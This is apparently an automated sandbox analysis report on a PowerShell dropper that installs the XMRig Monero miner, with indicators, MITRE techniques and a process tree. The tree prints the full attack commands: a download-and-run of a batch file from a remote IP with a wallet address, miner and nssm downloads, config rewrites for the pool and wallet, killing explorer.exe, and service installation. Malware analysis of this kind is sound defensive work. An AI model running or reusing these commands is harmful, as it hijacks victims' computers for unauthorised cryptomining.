xmrig | e68ae28adfa6a3fb898e890520e0c3eda33dbbe071d5503b4eeb440c93cd538a

Analysis

max time kernel
540s
max time network
520s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
04/07/2024, 23:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

trigger.ps1
Size

148B
MD5

f894b24ca3109bdc8167d849a1e19660
SHA1

5d295d603c423498aa3c80fcd35e328df13fd7fc
SHA256

e68ae28adfa6a3fb898e890520e0c3eda33dbbe071d5503b4eeb440c93cd538a
SHA512

0b8ee8cc214b559e79a6c0029ac2cd4df6a8c5a8dc22f756632bbdacee996cca023a20944e8a0117ba285ddd201c128a9184ab57210f0dd6e4c2a7eddb108ee9

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.254.97.190:2024/test.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 54 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000001ac3d-178.dat	family_xmrig
behavioral1/files/0x000700000001ac3d-178.dat	xmrig
behavioral1/memory/3720-181-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-463-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-464-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-465-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-466-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-467-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-468-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-469-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-470-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-472-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-473-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-474-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-475-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-476-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-477-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-478-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-479-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-480-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-481-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-482-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-483-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-484-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-485-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-486-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-487-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-488-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-489-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-490-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-491-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-492-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-493-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-494-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-495-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-496-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-497-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-499-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-500-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-501-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-502-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-503-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-504-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-505-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-506-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-507-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-508-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-509-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-510-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-511-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-512-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-513-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-514-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3792-515-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
1	3236	powershell.exe
3	4476	powershell.exe
5	4112	powershell.exe
8	1504	powershell.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 9 IoCs

pid	Process
3720	xmrig.exe
4996	nssm.exe
592	nssm.exe
4640	nssm.exe
4040	nssm.exe
820	nssm.exe
360	nssm.exe
3600	nssm.exe
3792	xmrig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
8	raw.githubusercontent.com

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3008	sc.exe
5064	sc.exe
4604	sc.exe
656	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1856	powershell.exe
208	powershell.exe
2332	powershell.exe
3236	powershell.exe
3460	powershell.exe
4536	powershell.exe
2684	powershell.exe
4476	powershell.exe
4112	powershell.exe
4240	powershell.exe
1504	powershell.exe
4756	powershell.exe
4092	powershell.exe
1592	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
2100	timeout.exe
2292	timeout.exe
4620	timeout.exe
2912	timeout.exe
1848	timeout.exe
4508	timeout.exe
624	timeout.exe
4964	timeout.exe
4572	timeout.exe
3632	timeout.exe
4876	timeout.exe
1544	timeout.exe
1328	timeout.exe
3628	timeout.exe
392	timeout.exe
1832	timeout.exe
4232	timeout.exe
4072	timeout.exe
2420	timeout.exe
4112	timeout.exe
2500	timeout.exe
4736	timeout.exe
2780	timeout.exe
3516	timeout.exe
3756	timeout.exe
4236	timeout.exe
2148	timeout.exe
2008	timeout.exe
1484	timeout.exe
1464	timeout.exe
792	timeout.exe
2312	timeout.exe
3452	timeout.exe
4572	timeout.exe
1188	timeout.exe
1108	timeout.exe
1596	timeout.exe
4640	timeout.exe
5060	timeout.exe
5064	timeout.exe
3348	timeout.exe
4508	timeout.exe
2368	timeout.exe
2368	timeout.exe
5112	timeout.exe
3316	timeout.exe
1300	timeout.exe
3120	timeout.exe
1480	timeout.exe
2384	timeout.exe
4440	timeout.exe
4668	timeout.exe
2784	timeout.exe
2120	timeout.exe
3840	timeout.exe
3936	timeout.exe
4068	timeout.exe
1484	timeout.exe
3592	timeout.exe
4176	timeout.exe
1516	timeout.exe
2888	timeout.exe
1148	timeout.exe
4388	timeout.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
3308	taskkill.exe
4236	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
3236	powershell.exe
3236	powershell.exe
3236	powershell.exe
4476	powershell.exe
4476	powershell.exe
4476	powershell.exe
4112	powershell.exe
4112	powershell.exe
4112	powershell.exe
1856	powershell.exe
1856	powershell.exe
1856	powershell.exe
4240	powershell.exe
4240	powershell.exe
4240	powershell.exe
208	powershell.exe
208	powershell.exe
208	powershell.exe
2332	powershell.exe
2332	powershell.exe
2332	powershell.exe
4756	powershell.exe
4756	powershell.exe
4756	powershell.exe
3460	powershell.exe
3460	powershell.exe
3460	powershell.exe
4092	powershell.exe
4092	powershell.exe
4092	powershell.exe
4536	powershell.exe
4536	powershell.exe
4536	powershell.exe
1592	powershell.exe
1592	powershell.exe
1592	powershell.exe
1504	powershell.exe
1504	powershell.exe
1504	powershell.exe
2684	powershell.exe
2684	powershell.exe
2684	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3236	powershell.exe
Token: SeDebugPrivilege	3308	taskkill.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	4236	taskkill.exe
Token: SeDebugPrivilege	4112	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	4240	powershell.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	4756	powershell.exe
Token: SeDebugPrivilege	3460	powershell.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	4536	powershell.exe
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeLockMemoryPrivilege	3792	xmrig.exe
Token: SeIncreaseQuotaPrivilege	2724	WMIC.exe
Token: SeSecurityPrivilege	2724	WMIC.exe
Token: SeTakeOwnershipPrivilege	2724	WMIC.exe
Token: SeLoadDriverPrivilege	2724	WMIC.exe
Token: SeSystemProfilePrivilege	2724	WMIC.exe
Token: SeSystemtimePrivilege	2724	WMIC.exe
Token: SeProfSingleProcessPrivilege	2724	WMIC.exe
Token: SeIncBasePriorityPrivilege	2724	WMIC.exe
Token: SeCreatePagefilePrivilege	2724	WMIC.exe
Token: SeBackupPrivilege	2724	WMIC.exe
Token: SeRestorePrivilege	2724	WMIC.exe
Token: SeShutdownPrivilege	2724	WMIC.exe
Token: SeDebugPrivilege	2724	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2724	WMIC.exe
Token: SeRemoteShutdownPrivilege	2724	WMIC.exe
Token: SeUndockPrivilege	2724	WMIC.exe
Token: SeManageVolumePrivilege	2724	WMIC.exe
Token: 33	2724	WMIC.exe
Token: 34	2724	WMIC.exe
Token: 35	2724	WMIC.exe
Token: 36	2724	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2724	WMIC.exe
Token: SeSecurityPrivilege	2724	WMIC.exe
Token: SeTakeOwnershipPrivilege	2724	WMIC.exe
Token: SeLoadDriverPrivilege	2724	WMIC.exe
Token: SeSystemProfilePrivilege	2724	WMIC.exe
Token: SeSystemtimePrivilege	2724	WMIC.exe
Token: SeProfSingleProcessPrivilege	2724	WMIC.exe
Token: SeIncBasePriorityPrivilege	2724	WMIC.exe
Token: SeCreatePagefilePrivilege	2724	WMIC.exe
Token: SeBackupPrivilege	2724	WMIC.exe
Token: SeRestorePrivilege	2724	WMIC.exe
Token: SeShutdownPrivilege	2724	WMIC.exe
Token: SeDebugPrivilege	2724	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2724	WMIC.exe
Token: SeRemoteShutdownPrivilege	2724	WMIC.exe
Token: SeUndockPrivilege	2724	WMIC.exe
Token: SeManageVolumePrivilege	2724	WMIC.exe
Token: 33	2724	WMIC.exe
Token: 34	2724	WMIC.exe
Token: 35	2724	WMIC.exe
Token: 36	2724	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3936	WMIC.exe
Token: SeSecurityPrivilege	3936	WMIC.exe
Token: SeTakeOwnershipPrivilege	3936	WMIC.exe
Token: SeLoadDriverPrivilege	3936	WMIC.exe
Token: SeSystemProfilePrivilege	3936	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3792	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3236 wrote to memory of 4956	3236	powershell.exe	74
PID 3236 wrote to memory of 4956	3236	powershell.exe	74
PID 4956 wrote to memory of 3308	4956	cmd.exe	76
PID 4956 wrote to memory of 3308	4956	cmd.exe	76
PID 4956 wrote to memory of 4476	4956	cmd.exe	78
PID 4956 wrote to memory of 4476	4956	cmd.exe	78
PID 4476 wrote to memory of 508	4476	powershell.exe	79
PID 4476 wrote to memory of 508	4476	powershell.exe	79
PID 508 wrote to memory of 4560	508	cmd.exe	80
PID 508 wrote to memory of 4560	508	cmd.exe	80
PID 4560 wrote to memory of 2776	4560	net.exe	81
PID 4560 wrote to memory of 2776	4560	net.exe	81
PID 508 wrote to memory of 1356	508	cmd.exe	82
PID 508 wrote to memory of 1356	508	cmd.exe	82
PID 508 wrote to memory of 5112	508	cmd.exe	83
PID 508 wrote to memory of 5112	508	cmd.exe	83
PID 508 wrote to memory of 4860	508	cmd.exe	84
PID 508 wrote to memory of 4860	508	cmd.exe	84
PID 508 wrote to memory of 3040	508	cmd.exe	85
PID 508 wrote to memory of 3040	508	cmd.exe	85
PID 508 wrote to memory of 1848	508	cmd.exe	86
PID 508 wrote to memory of 1848	508	cmd.exe	86
PID 508 wrote to memory of 5064	508	cmd.exe	87
PID 508 wrote to memory of 5064	508	cmd.exe	87
PID 508 wrote to memory of 4604	508	cmd.exe	88
PID 508 wrote to memory of 4604	508	cmd.exe	88
PID 508 wrote to memory of 4236	508	cmd.exe	89
PID 508 wrote to memory of 4236	508	cmd.exe	89
PID 508 wrote to memory of 4112	508	cmd.exe	90
PID 508 wrote to memory of 4112	508	cmd.exe	90
PID 508 wrote to memory of 1856	508	cmd.exe	91
PID 508 wrote to memory of 1856	508	cmd.exe	91
PID 508 wrote to memory of 4240	508	cmd.exe	92
PID 508 wrote to memory of 4240	508	cmd.exe	92
PID 508 wrote to memory of 3720	508	cmd.exe	93
PID 508 wrote to memory of 3720	508	cmd.exe	93
PID 508 wrote to memory of 424	508	cmd.exe	94
PID 508 wrote to memory of 424	508	cmd.exe	94
PID 424 wrote to memory of 208	424	cmd.exe	95
PID 424 wrote to memory of 208	424	cmd.exe	95
PID 208 wrote to memory of 1968	208	powershell.exe	96
PID 208 wrote to memory of 1968	208	powershell.exe	96
PID 508 wrote to memory of 2332	508	cmd.exe	97
PID 508 wrote to memory of 2332	508	cmd.exe	97
PID 508 wrote to memory of 4756	508	cmd.exe	98
PID 508 wrote to memory of 4756	508	cmd.exe	98
PID 508 wrote to memory of 3460	508	cmd.exe	99
PID 508 wrote to memory of 3460	508	cmd.exe	99
PID 508 wrote to memory of 4092	508	cmd.exe	100
PID 508 wrote to memory of 4092	508	cmd.exe	100
PID 508 wrote to memory of 4536	508	cmd.exe	101
PID 508 wrote to memory of 4536	508	cmd.exe	101
PID 508 wrote to memory of 1592	508	cmd.exe	102
PID 508 wrote to memory of 1592	508	cmd.exe	102
PID 508 wrote to memory of 1504	508	cmd.exe	103
PID 508 wrote to memory of 1504	508	cmd.exe	103
PID 508 wrote to memory of 2684	508	cmd.exe	104
PID 508 wrote to memory of 2684	508	cmd.exe	104
PID 508 wrote to memory of 656	508	cmd.exe	105
PID 508 wrote to memory of 656	508	cmd.exe	105
PID 508 wrote to memory of 3008	508	cmd.exe	106
PID 508 wrote to memory of 3008	508	cmd.exe	106
PID 508 wrote to memory of 4996	508	cmd.exe	107
PID 508 wrote to memory of 4996	508	cmd.exe	107

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\script_5472b326.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4956
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK; Remove-Item -Force $tempfile"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7223.tmp.bat" 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:508
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4560
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:2776
    - - C:\Windows\system32\where.exe
        
        where powershell
        5⤵
        
        PID:1356
    - - C:\Windows\system32\where.exe
        
        where find
        5⤵
        
        PID:5112
    - - C:\Windows\system32\where.exe
        
        where findstr
        5⤵
        
        PID:4860
    - - C:\Windows\system32\where.exe
        
        where tasklist
        5⤵
        
        PID:3040
    - - C:\Windows\system32\where.exe
        
        where sc
        5⤵
        
        PID:1848
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:5064
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:4604
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /t /im xmrig.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4236
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4112
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1856
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4240
    - - C:\Users\Admin\moneroocean\xmrig.exe
        
        "C:\Users\Admin\moneroocean\xmrig.exe" --help
        5⤵
        Executes dropped EXE
        
        PID:3720
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:424
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:208
        
        C:\Windows\system32\HOSTNAME.EXE
        
        "C:\Windows\system32\HOSTNAME.EXE"
        7⤵
        
        PID:1968
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4756
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Uoklywyh\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3460
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4092
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4536
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1592
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1504
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2684
    - - C:\Windows\system32\sc.exe
        
        sc stop moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:656
    - - C:\Windows\system32\sc.exe
        
        sc delete moneroocean_miner
        5⤵
        Launches sc.exe
        
        PID:3008
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
        5⤵
        Executes dropped EXE
        
        PID:4996
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
        5⤵
        Executes dropped EXE
        
        PID:592
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
        5⤵
        Executes dropped EXE
        
        PID:4640
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
        5⤵
        Executes dropped EXE
        
        PID:4040
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
        5⤵
        Executes dropped EXE
        
        PID:820
    - - C:\Users\Admin\moneroocean\nssm.exe
        
        "C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
        5⤵
        Executes dropped EXE
        
        PID:360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2724
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3956
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:344
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3472
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3972
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4964
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2520
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4456
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2716
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
